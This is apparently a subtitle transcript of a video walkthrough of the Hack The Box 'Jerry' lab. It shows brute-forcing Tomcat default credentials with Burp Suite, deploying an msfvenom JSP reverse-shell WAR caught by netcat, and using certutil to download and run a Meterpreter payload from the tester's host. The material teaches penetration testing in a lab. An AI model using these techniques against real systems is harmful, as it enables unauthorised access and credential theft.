[00:00:00,480 --> 00:01:36,960] So today's machine is going to be Jerry. Jerry lives at 10.10.10.95. So if you're not already on this site, go ahead and go to Hack The Box. You go over here to your all machines and scroll down to Jerry and hit the play button. Once you've got that all set up, let's go ahead and get Jerry scanning, so I'm going to open up a new terminal here and we'll do our typical scan and stall while I scan it. We'll talk about it until the scan comes back, and then we'll look at the scan, so you can go ahead and use your favorite scan method. You should know mine by now. Very straightforward here, and we'll let that run, so let's talk about Jerry. Jerry is a Windows machine, as we can see here. And historically, Jerry is one of the most rooted and easier machines on Hack The Box. We can see here that it's got 12,000 user owns and roots, and we can see from the rest that, I mean, the next closest on the list is eight thousand, right. So by far Jerry is one of the most rooted, if not the most rooted, machines. So while it's easy, it does not mean that it does not have important lessons to teach us. The most important lesson we're gonna learn today is about default credentials. Why are default credentials so bad, and why are they so common still? I run into default credentials as a pen tester all the time on the external web.
[00:01:36,960 --> 00:02:58,760] In my history I have run into cisco/cisco as a default credential on a Cisco router leading to internal network access. I have gotten domain admin off of a printer with default credentials on an internal network. I've gotten reverse shells off of default credentials on internal networks, so default credentials can lead to some very, very bad things, and you're going to see an example of that today. On top of that, what we're going to be doing is some bash scripting. We'll do a little bit of brute forcing; we're going to be using Burp Suite today. There's a lot of cool tactics that I can show you that are going to just improve our learning process. On top of that, I'll talk about some manual exploitation for this machine: we'll use msfvenom to generate some shell, but we'll use netcat to actually get in the machine, and then we'll talk about file transfers and how to improve. So we've got a lot to learn from a very, very basic box. So let's go ahead and just take a look at the scan now. So our scan came back, and sixty-five thousand five hundred thirty-four ports were filtered. That is great. Why is that great? That means we only have one port to focus on here, and that port is 8080. Now there are some situations where there might be hidden ports, like port knocking, but for a machine this easy on Hack The Box,
[00:02:58,980 --> 00:04:13,470] I'm not thinking that that's the path. So when we're looking at 8080, this says, hey, vulnerability for sure somewhere in 8080. That's where you're going to get it. So we've got some version information here: we can see Apache Tomcat with the JSP engine 1.1, and we can also see the Apache Tomcat version number here of 7.0.88. So as we talked about before, this is perhaps a default web page. We're getting a lot of Tomcat information here. And if it's not a default web page, why are they disclosing their server headers with service information? No, that's just a no-no. We would write this up on a pen test report as a finding. So there are some things that we can do right off the bat here. You know, my first decision, as always, is to go to the web page and see what I'm working with. But if we do want to, we can also google something like "Apache Tomcat 7.0.88 exploit" and see if there's any exploits out there; we could do the same for this JSP engine and see if there's any exploits for that. Those would be version exploits, right. Before we do that, or we're not actually going to get into that, but before we did that, my step would always be to go out to the web page just to see what's going on.
[00:04:13,680 --> 00:05:33,840] And in this instance we're working with port 8080, so we're going to go out and we're just going to go to 10.10.10.95. You can see I have it here with the port 8080 at the end. Go ahead and hit enter, and we're brought to this Apache Tomcat page. Now, this is not a good page you should be leaving open, even if it's on the internal network. But if this is on the external, this is bad. You'll find this on external networks. People will tuck it away under like /manager or /admin or whatever, because this over here on the side is what gets you into the admin panels. So you do see this a lot. This Apache Tomcat is very realistic. And if there is any sort of guessable credentials on this side of the house, oh, it's game over, and you're going to find out why. So this would be a finding too, depending on what you're doing, and if this is external, this is like, hey, why do you have this up? You know, you should put this behind a VPN so that only you can access it when you're on the internal side. Don't leave this open on the external network. On the internal side, you know, is this VLAN'd off? Who has access to this page? Why do they have access to this page? You don't want this easily accessible by any means.
[00:05:33,840 --> 00:06:41,730] So we're at this page and we have this manager app over here on the side. Now we can log in with the manager app and do some malicious things. But before we can log in here, one of the first things I do when I see a login on a login page like this with the service version, I'm going right to Google and saying, hey Google, what's up? Let's talk about Apache Tomcat default credentials and let's see what we can pull up. First thing that comes up is GitHub, right. And we can come into GitHub, and GitHub has this wonderful list, because Tomcat has quite a few default credentials. So what we can do is we can take this list and use it in a brute force. Now there are tools out there that'll do this for us. I kind of want to get a little crafty today and teach us some manual methods. I think that will be more fun. So what we're going to do is we're going to fire up Burp Suite; in the newer Burp it errors out with this Java error. Don't worry about it too much. We're not gonna worry about fixing it today. I'll just work around it.
[00:06:41,800 --> 00:08:15,980] So we're going to go ahead and just click next, and start Burp with defaults. Now, in order to get Burp Suite working, there is this proxy here, right; in the proxy, if we go actually into the options tab, it sits at 127.0.0.1, the home address, on port 8080, and this is how we intercept traffic. So we need to actually do that: we need to go into our little hamburger menu here and go up to preferences, or down to preferences, scroll all the way down, and at the very bottom is the network proxy. We're going to filter all of our traffic through Burp Suite. Right now you should be set to "use system proxy settings"; go ahead and select "manual proxy configuration". 127.0.0.1 here, port 8080 here, and click the box for "use this proxy server for all protocols". So it should look like this when it's all said and done, OK. So we'll hit OK on that and we'll test this out. If we go back to the Apache Tomcat and we just hit enter, it shouldn't load; it should freeze here. Some things should just be spinning, and if you look at your proxy: the proxy got intercepted. What's going on? Well, what's happening here is we intercepted the request, and before we send it to the page we have the opportunity to modify it. We can say instead of a GET request, you could put this as a POST request; we can get malicious in here; we could do all sorts of things.
[00:08:16,120 --> 00:09:34,730] And this is where the testing really becomes fun, is when we start tampering and doing certain, you know, malicious activities with these requests. But for now let's just go ahead and forward it. And you should see the page reloads. Perfect. What we're after today is this manager app. So if we click on manager app, you see that, OK, it freezes on manager. Let's just forward this request and see what happens. All right. So 10.10.10.95:8080. It's asking us for credentials. Well, there's twenty-one or so on that list, but one I did remember was tomcat/tomcat. So let's try tomcat/tomcat and just say OK. Now immediately this intercepts the request, and a lot of times what you'll see is a username field and a password field here. But we're actually getting this Authorization: Basic, and it looks like it's encoded with base64. You can usually tell this by the equal signs at the end, typically. So what we can do here is we can right click on this and we can say send this to decoder; that's one option we're going to do, and you'll see your decoder tab lights up. Right.
[00:09:35,540 --> 00:10:55,950] And you come in here and you just scroll down and highlight this whole area, and let's see what it's doing. We'll "decode as" over here, and we'll say base64. If we scroll down, you can see it's just saying, hey, tomcat:tomcat. So username:password is what it's attempting. And let's go ahead and forward this and see what happens. Doesn't look like it worked, right. So we forwarded it and it didn't work. OK. We could try manager/tomcat or something along those lines. And this time what we can do is intercept it one more time. We could do a couple different cool little things. One is we could say, hey, send this to repeater, and, hey, number two, send this to intruder, so we'll see both of our tabs light up. If we look at repeater, repeater just repeats requests; we have the opportunity, instead of sending it in real time with the proxy, to come back over here and send the request and see what the response is. So this is where we can kind of just play with certain requests and see how the server responds. So if we hit go on this, we can see that we got a 401 unauthorized; so 401 means, hey, you did not get access to here. So this set of credentials is incorrect.
[00:10:56,360 --> 00:12:26,190] And OK, let's just go ahead and turn the intercept off, or let this go and cancel, and then let's go ahead and try brute forcing this, because, you know, there's 20-something here, right; 30 lines, it says 30 lines of passwords. That's a lot of passwords. So what we'll do is let's go into our new window, OK, and let me make this better, and I'm going to use gedit because I like gedit. So let's just say gedit tomcat.txt. What we'll do here is we will copy all these usernames and passwords and then paste them into here. Now select the space in between. Remember the format that we had. We've got to put this into base64. So what we're gonna do, I guess, to explain that a little bit better, is we sent our request to intruder, and if we come into positions here we see that our request is sitting here. What intruder is going to do is a brute force style attack based on the attack type that we select. Well, the requests are coming through in base64. So we have to put these into base64 in that format that we saw, see, username:password. We're going to do the same thing; now let's get this set up. Then we're going to convert these to base64, and then we're going to fire them off. So first things first, let's go back into here: we've got this little space, copy, let's hit Ctrl+H.
[00:12:26,210 --> 00:13:54,500] That's our find and replace. Let's go ahead and just paste that space here. And what we're gonna do is we're going to just replace everything that has that kind of space with this colon, or replace all. And look how easy that was. So now we've got a set list of credentials here that is actually twenty-five lines long. And so we're gonna save this out, and we're gonna write a little bash script. So if you have never used any bash scripting, one, I recommend watching some videos on bash scripting. I've got a few on my channel; if you watch the tail end of the Linux for Ethical Hackers course, it's in there. I've got individual videos on it as well. Pretty much typically the same lesson, but the importance of what you're about to see is called a for loop, and for loops are awesome. You see one-line for loops a lot, and they're just very useful when it comes to pen testing. So let's break down what we're going to do. So we've got credentials in this list, right. We've got these credentials, and we'll just take one for an example. We want to convert these credentials into base64, so one way we can do that is we can use echo, and we say echo -n, and we're gonna say, I want to put that, say tomcat:tomcat, right like that, into base64.
[00:13:55,190 --> 00:15:19,190] This is the command to do that: echo -n tomcat:tomcat | base64. And there it is. Now if we were to decode this, this would come back out as tomcat:tomcat. OK, that's cool, but we've got a long list here in this tomcat.txt, and what we need to do is do this for everything in that list. So let's write a for loop and we'll talk through it. So I'm going to say "for cred", and you'd call this whatever you want, you call it Bob if you want, but for cred, it's our variable, in, and we've got to specify what the credentials are and where they're at. So every line here is going to be a credential in this loop. And I'll explain it in a little bit better detail, but we're gonna cat out this tomcat.txt, meaning we're going to print all the lines. And what's going to happen is we're going to do something: we're going to do an echo -n for that credential, and we're going to pipe it into base64, and then we're gonna say done: for cred in $(cat tomcat.txt); do echo -n $cred | base64; done. So what's happening here? A for loop means you're going to do something for everything in that instance, right. So for the first line in tomcat.txt, for the second line, for the third line, until you are completely done; so for cred, all we're saying is, hey, the first line, we're going to call that cred.
[00:15:19,220 --> 00:16:34,150] And then when that first line prints out in this cat, we're gonna put it over here in this echo command, put it through base64, and then we're going to go back again; the second line, we're going to call that cred. We're going to do it again, and then we're gonna go all the way through and base64 all of these, and then it should print out and be done. Boom, look at that. OK. So you've got all the credentials that we just put through in base64 format, so what we're gonna do is just copy all these here, and we're going to go back into Burp Suite. Now, of course, like I said, there is a tool that's out there for this, or you can manually type these, but with so many default credentials... most websites, or most programs, only have like two sets of default credentials. But Tomcat, for whatever reason, has a lot. But here we go, we're in Burp Suite. Now, in order to use intruder, we need to set up what we're going to intrude on. So here we need to set our payload parameter area. We're going to set the position of one here. This is position 1, OK. And we're saying, hey, everything here, this is what we're going to replace. So we're going to use a sniper attack, and sniper just means one. That's how you can think of it.
[00:16:34,150 --> 00:17:42,520] This is just one payload that we're gonna be sending off. So if we go into the payloads tab over here, we can just hit paste on our list, and you can see now it's going to fire off twenty-five payloads. What it's gonna do is it's going to replace the base64 that we highlighted with the base64 that's here. One other thing that we need to take off here is this URL encoding; it's going to attempt to URL-encode these characters, and in this instance, if it tries to URL-encode these equal signs, it's actually going to fail for us. So it should be noted that we're also on the free community edition of Burp Suite. Thus it's going to be slower. The free edition is very slow. The pro edition: very fast. So we're gonna hit start attack, and it's gonna say, hey, we're gonna slow this down just to be jerks, and what's gonna happen here is we're going through all twenty-five requests, right. And you can see different status codes come through. I mean, that's what we're looking at; we're looking at two things. One, we could sort by status code; two, we could sort by the length here. Now some advanced topics or tactics: when you're running through thousands, say you're doing a username
[00:17:42,520 --> 00:18:47,370] brute force and you're trying to find the one person that you know might have gone through, you can come through, say, on our response, and you could see something in here that says like "you're not authorized to be on this page"; you can copy "you're not authorized" and you can paste it down into your payload rules here, or options, and say, hey, grep on this, and then you'll have a little checkbox up here that says "you are not authorized", and it will check every time it comes through here. And then you could just sort by that. So if you click on these you can sort by different things, right. So length is a big one: if length changes, look how significant this length is here, and you see the rest of these. Nothing. Any 400, we don't really care about; this one, 403, for whatever reason forbidden, access denied; this one, that might be a valid set of credentials, but we don't have access to that application. This one is a valid set of credentials; look at the 200 status, that means OK. And on top of it we have a 17,000 length compared to two thousand or three thousand here.
[00:18:48,130 --> 00:20:28,100] So significant differences, but in long lists it's better to grep on something like an error and then just sort by that error with the checkboxes, to find, you know, maybe a different message that came through, as opposed to just looking for a length or status codes, because you might get like a 302 redirect or something on a login, or a successful login. OK. So here we've got these credentials, which actually come out to tomcat secret; that is how that played out. So this is tomcat secret, in case you are curious. OK. And so that logs us in, so let's go ahead and say no to these changes. We know for sure that we're in. Let's go to the page, and what I'm going to do for the rest of this time, I'm going to go ahead and turn off Burp Suite and these proxy settings, and let's just log into the manager app with our newfound credentials. And you could have base64 decoded this; I was just being lazy, by the way. You could come in here and say, hey, what is this, because I have no idea, I can't read this. You can easily just go to decoder and decode that, right, and see that it's tomcat secret, OK. So from here we are now in the application itself. So if you've never been in a Tomcat application, they use something called WAR files, okay; WAR files are uploaded here and they deploy these applications.
[00:20:28,120 --> 00:21:47,350] You see manager, host-manager, examples, blah blah blah. Well, what we can do is upload a malicious WAR file and get a reverse shell. See, there is an area here to upload a WAR file. Now, this is your first time in the application and you're new, and you're like, oh man, what am I doing here? You say, OK, well, I see that there's a WAR file. I wonder if I can be malicious with that. And then you might go and search "war file reverse shell" or something along those lines, "war file exploit", and then you could see there's all kinds of articles that come through: using Metasploit to create a WAR backdoor, Apache Tomcat WAR backdoor. So this is the kind of information that we're after. A couple of the things that we see down here that help us out as well is we see that we're running on a Windows Server 2012 R2. That means that we're likely running on 64-bit, right. This is an R2 server and we get some information about the OS. That's nice. Oh, amd64, it is 64-bit. So we picked up a little bit of information: hostname and IP address, so a little bit of information disclosure there as well that'll help us when we're trying to make this WAR file. Right. So what we're gonna use is msfvenom. There's "Tomcat war reverse shell msfvenom"; click on that here.
[00:21:47,410 --> 00:23:01,860] This is good. So this is "creating Metasploit payloads" here. This netsec.ws is good. There's a lot of cheat sheets out there for different ones. This is a very nice cheat sheet that I like to go to, as you can see I've already been to it before. You could just go down the list; like if this is a PHP site, we can go to a site, and I think I've showed you this before for the PHP one. Same thing here, we're just using a WAR file. We're gonna generate this on our own. So let's go ahead and let's Ctrl+L, and let's see what it wants us to do. Let's just copy and paste all this; we'll be lazy, OK. And we'll paste it in. Now we have two options here, right. We can do the manual method, which is what we're doing, or we could do the Metasploit method. We'll do the manual method today, but we could change the payload to a meterpreter payload and use the exploit handler in Metasploit and get an exploit, or a meterpreter shell, easily. OK. So let's go back and let's just talk about what we're seeing: msfvenom -p for payload. We are running on Java on this platform, and we're gonna be using a jsp_shell_reverse_tcp. Notice all the underscores, not the forward slashes. This is getting sent all at once.
[00:23:01,860 --> 00:24:31,900] This is an unstaged payload, not a staged payload. So let's go ahead and enter in the IP address that we're going to be using. I actually don't know mine, so I'll open up a new tab really quick and do the ifconfig, or ip a. 10.10.14.24 for me. So we're gonna be listening on our IP address, and you can listen on the port of your choice. I will just use the standard 4444 on this machine, and then we're going to generate this, and it takes just a second here, OK. We have generated a shell.war file. That means we need to be listening on this 4444 in order for this shell to come back to us. Let's go ahead and use netcat, nc -nlvp. So netcat is a listener slash connector. It's a port tool. It's amazing functionality. What we're really doing here is we're saying, hey, netcat, I want to listen right now, and again, remember, when we're doing a reverse shell, that just means somebody talks back to us. All we have to do is listen. So we're gonna be listening on 4444. That's the port we're listening on now. What's gonna happen is this is going to say we're going to upload it, and then it's going to try to connect back to the IP address that we supply. Let's go ahead and browse for that WAR file.
349 00:24:31,900 --> 00:24:42,040 I put mine in my root folder, and there it is, shell.war.
350 00:24:42,130 --> 00:24:45,850 And we're gonna say deploy. We've deployed it.
351 00:24:45,970 --> 00:24:51,920 You can see here that it is /shell, and we've got nothing yet.
352 00:24:52,210 --> 00:24:58,650 But we can force this along and get that shell by going to it, and boom, look at that.
353 00:24:58,650 --> 00:25:00,640 It talked back to us.
354 00:25:00,640 --> 00:25:02,280 We are so malicious.
355 00:25:02,440 --> 00:25:02,890 OK.
356 00:25:03,280 --> 00:25:06,970 So the best thing about this box also is whoami:
357 00:25:06,980 --> 00:25:07,850 NT AUTHORITY\SYSTEM.
358 00:25:07,860 --> 00:25:08,970 Right off the bat.
359 00:25:09,130 --> 00:25:14,790 And if we go to the Users folder, remember this from a long time ago,
360 00:25:14,920 --> 00:25:16,080 if we say dir,
361 00:25:16,150 --> 00:25:18,540 actually Desktop, sorry, and we say dir,
362 00:25:18,890 --> 00:25:19,840 and we type,
363 00:25:19,840 --> 00:25:22,910 you see it's flags, or it might be, is that
364 00:25:22,930 --> 00:25:23,680 that's a directory?
365 00:25:23,680 --> 00:25:28,200 Let's go to the flags directory and then do dir.
366 00:25:28,450 --> 00:25:32,380 And then two for the price of one, they actually give you both flags here.
367 00:25:32,410 --> 00:25:38,830 So the fact that there are people that only had, there were more root owns than there were
368 00:25:38,830 --> 00:25:43,840 user owns, for whatever reason some people decided they didn't want the user own on this machine.
369 00:25:44,050 --> 00:25:45,580 But both flags are sitting in there.
370 00:25:45,610 --> 00:25:47,280 So I think that's funny.
371 00:25:47,470 --> 00:25:50,280 Anyway, we're back in here. OK.
372 00:25:50,280 --> 00:25:56,840 We have SYSTEM on this machine, we can do all kinds of commands and look around, right.
373 00:25:56,980 --> 00:26:03,450 You know, we can look at the arp, see who we're talking to, sorry, arp -a, we're not talking to anybody
374 00:26:03,480 --> 00:26:07,770 but 10.10.10.2 and 10.10.10.255.
375 00:26:08,010 --> 00:26:09,480 Now this really isn't useful again.
376 00:26:09,480 --> 00:26:13,890 This is just for your knowledge, it's not going to be very useful in a Hack The Box environment like
377 00:26:13,890 --> 00:26:18,660 this; if you're doing like a lab environment, super useful to see who it's talking to.
378 00:26:18,660 --> 00:26:19,950 Same thing with netstat.
379 00:26:19,950 --> 00:26:23,570 Same thing with the route, route print on Windows.
380 00:26:23,970 --> 00:26:25,240 So, OK.
381 00:26:25,260 --> 00:26:30,230 We found our flags, this is cool, but we're still in that limited flexibility.
382 00:26:30,570 --> 00:26:36,010 So let's go ahead and talk about how we can improve the shell. Again we're going to use Metasploit.
383 00:26:36,030 --> 00:26:39,580 We're going to do this a little bit outside the box this time.
384 00:26:39,630 --> 00:26:44,700 So what I want to do is I want to create a reverse shell to this machine.
385 00:26:44,820 --> 00:26:52,040 We're going to generate a new reverse shell, so we'll come into here and we'll use msfvenom
386 00:26:52,040 --> 00:26:53,340 like before.
387 00:26:53,760 --> 00:27:01,380 So we'll say msfvenom, we'll do a payload here, windows, because we know it's a Windows machine,
388 00:27:01,560 --> 00:27:07,100 x64 because we know it's 64-bit, and we'll say meterpreter
389 00:27:09,890 --> 00:27:13,570 and then we'll try shell_reverse_tcp.
390 00:27:13,580 --> 00:27:15,280 And that may or may not work.
391 00:27:15,500 --> 00:27:18,550 So we'll try staged and unstaged here.
392 00:27:18,620 --> 00:27:23,160 Our LHOST again, mine is 10.10.14.26,
393 00:27:23,230 --> 00:27:29,260 and the LPORT is going to be, let's do 5555.
394 00:27:29,270 --> 00:27:34,580 So we don't interfere with the 4444 we already have on, and then all we need is a file type, which is
395 00:27:34,580 --> 00:27:45,310 exe, and we'll put that into a shell, we'll just call it sh.exe. Let that generate. On top of that,
396 00:27:45,310 --> 00:27:49,710 let's go ahead and go into Metasploit, and we'll say hey Metasploit,
397 00:27:50,200 --> 00:27:51,820 how are you doing.
398 00:27:51,820 --> 00:27:53,620 I want to run your exploit handler.
399 00:27:53,650 --> 00:28:02,380 So this should look familiar from last time, and it looks like I picked up a bad shell here, so
400 00:28:02,380 --> 00:28:04,330 maybe I don't know what I'm doing.
401 00:28:04,450 --> 00:28:10,600 So let's go into use exploit/multi/handler and let's see what the name of that is.
402 00:28:10,720 --> 00:28:20,730 So we'll say set payload, and we'll say windows, you tab it, it's a little slow, x64, meterpreter, I think
403 00:28:20,730 --> 00:28:22,730 it's just maybe reverse_tcp.
404 00:28:23,610 --> 00:28:24,120 Yeah.
405 00:28:24,230 --> 00:28:35,870 Not shell_reverse_tcp, it's just reverse_tcp, and delete that, regenerate it, sorry, and come back in here,
406 00:28:35,870 --> 00:28:43,430 while that's regenerating we could say options, and we'll just say set LHOST,
407 00:28:43,460 --> 00:28:53,120 same thing we just specified, 14.26, set LPORT 5555, and now we're just going to
408 00:28:53,120 --> 00:28:54,440 run this and listen on it.
409 00:28:58,720 --> 00:29:00,050 It said it failed to bind.
410 00:29:00,060 --> 00:29:08,670 Why is it failing to bind? Let's check our IP one more time. 14.24, guys, I am screwing
411 00:29:08,670 --> 00:29:09,530 up so bad.
412 00:29:10,160 --> 00:29:10,700 OK.
413 00:29:11,760 --> 00:29:15,510 Hopefully you're running the right IP address and you're not being like me.
414 00:29:16,660 --> 00:29:19,210 I have to fix this payload really quick
415 00:29:19,210 --> 00:29:29,470 to be .24. I've been doing the OffSec labs all week, all last week, and my IP addresses were a
416 00:29:29,470 --> 00:29:30,330 little bit different.
417 00:29:30,360 --> 00:29:32,980 So that's kind of why I'm getting these numbers mixed up.
418 00:29:34,410 --> 00:29:34,870 OK.
419 00:29:34,910 --> 00:29:40,920 So we're running on this now, and we are also running on the correct payload.
420 00:29:41,040 --> 00:29:45,140 So how do we get a file onto a Windows machine?
421 00:29:45,150 --> 00:29:50,490 Well, first and foremost we need to host a web server.
422 00:29:50,490 --> 00:29:55,920 The easiest way to host a web server is with Python.
423 00:29:55,920 --> 00:30:09,270 Now we could just say python -m, and we could say http.simple, sorry, SimpleHTTPServer on 80, like
424 00:30:09,270 --> 00:30:10,640 this.
425 00:30:10,640 --> 00:30:14,070 And that's going to load up a SimpleHTTPServer.
426 00:30:14,100 --> 00:30:20,500 So we're in here, and now we're hosting up every single file that is in this root folder.
427 00:30:20,560 --> 00:30:21,370 So that's a nice thing.
428 00:30:21,370 --> 00:30:24,090 We've got instant access to everything that's here.
429 00:30:24,090 --> 00:30:30,750 We can cut it out as soon as we want to and be done, so we can go to our 10.10.14.24
430 00:30:30,750 --> 00:30:33,910 and see everything that I'm hosting here.
431 00:30:34,170 --> 00:30:39,660 And then as soon as I don't want to host it anymore, and you can see what's going on as well, that status
432 00:30:39,660 --> 00:30:43,900 commands, awesome, Ctrl-C, I come back and it's dead.
433 00:30:44,220 --> 00:30:46,110 So it's just for as long as you need it.
434 00:30:46,800 --> 00:30:50,480 So we've got the shell now being hosted.
435 00:30:50,730 --> 00:31:00,500 And when we talk about collecting or transporting files on Windows, there is a tool that's on there.
436 00:31:00,560 --> 00:31:05,270 Now it's starting to get picked up by Defender, but for a long time it didn't.
437 00:31:05,550 --> 00:31:09,050 So on assessments it still works fairly well.
438 00:31:09,050 --> 00:31:15,220 What we can do here is a built-in tool. Now everybody knows about wget for Linux.
439 00:31:15,230 --> 00:31:20,760 This is my idea of the quick and dirty way of doing like a wget for Windows
440 00:31:20,780 --> 00:31:23,300 that's not very commonly well known.
441 00:31:23,420 --> 00:31:28,020 So let's just go and say we'll just put it in the flags folder, that's fine.
442 00:31:29,030 --> 00:31:30,740 So we'll say certutil,
443 00:31:33,380 --> 00:31:41,840 certutil, like I typed, and we're going to say -urlcache, meaning we're bringing over a
444 00:31:41,840 --> 00:31:52,490 file, the URL, we're going to do a -f for the file and say hey, I'm going to grab 10.10.14.24
445 00:31:52,550 --> 00:31:55,640 /sh.exe.
446 00:31:55,830 --> 00:32:04,680 And while I'm at it, let's put that file in Users\Administrator\Desktop\flags, and we'll also call it
447 00:32:04,740 --> 00:32:10,050 sh.exe. OK, you can see it grabbed it, we can say dir
448 00:32:10,050 --> 00:32:14,040 just to make sure. OK, sh.exe is in here.
449 00:32:14,040 --> 00:32:19,440 And on top of that, if we go to our file server you can see that sh.exe was actually retrieved
450 00:32:19,490 --> 00:32:20,760 from our file server.
451 00:32:20,760 --> 00:32:24,990 So this is nice when you're running like a blind payload on a web server and you don't know if it's
452 00:32:24,990 --> 00:32:26,250 actually downloading.
453 00:32:26,340 --> 00:32:31,370 You can have it download something to see if you got command execution like this, and know for sure that
454 00:32:31,380 --> 00:32:32,500 something came through.
455 00:32:32,520 --> 00:32:43,120 I ran into that just this past weekend actually, so from here we're going to say sh.exe, run it, and
456 00:32:43,120 --> 00:32:44,080 look what happened.
457 00:32:44,080 --> 00:32:47,090 We now have a Meterpreter reverse shell.
458 00:32:47,290 --> 00:32:57,010 Now in the real world this is going to be picked up fairly, fairly easily, I would imagine.
459 00:32:57,790 --> 00:33:03,070 But you know, we could obfuscate this more, but in a situation like this, or even a bad environment where
460 00:33:03,070 --> 00:33:08,220 they don't have good AV, something like this is not going to get picked up at all.
461 00:33:08,230 --> 00:33:13,420 So this is just a nice way to show you like hey, we can get a Meterpreter session and now we can just
462 00:33:13,420 --> 00:33:14,280 do a hashdump.
463 00:33:14,520 --> 00:33:17,190 You know, we have control over what we can do.
464 00:33:17,530 --> 00:33:19,990 And we have a lot more flexibility again.
465 00:33:20,020 --> 00:33:25,510 So yes, it ends in Meterpreter, but we went a very manual method of doing it.
466 00:33:25,540 --> 00:33:27,160 We also, what did we learn today?
467 00:33:27,160 --> 00:33:30,910 We learned default credentials are very bad and can lead to very bad things.
468 00:33:30,940 --> 00:33:38,320 We learned that we can use some nifty little tricks in for loops and get something done very quick with
469 00:33:38,320 --> 00:33:40,210 some basic bash scripting.
470 00:33:40,210 --> 00:33:45,190 We learned how to use Burp Suite, we learned about Repeater and the proxy and Intruder.
471 00:33:45,190 --> 00:33:49,420 A lot of cool features in there that we'll only dive into more as we go.
472 00:33:49,420 --> 00:33:55,660 And we learned how to transfer files on a Windows machine to improve a shell and just, you know, get better
473 00:33:55,690 --> 00:33:56,700 overall.
474 00:33:56,710 --> 00:34:01,030 So thank you so much for joining me, and until next time, my name is TCM.
475 00:34:01,040 --> 00:34:01,960 Thank you for having me.